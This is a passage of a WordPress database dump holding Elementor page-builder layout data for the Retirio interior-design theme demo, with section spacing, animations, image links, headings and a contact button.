lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(3226,4767,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3227,4767,'_elementor_pro_version','3.8.1'),(3228,4768,'_wp_page_template','elementor_header_footer'),(3229,4768,'_elementor_edit_mode','builder'),(3230,4768,'_elementor_template_type','wp-page'),(3231,4768,'_elementor_version','3.8.1'),(3232,4768,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\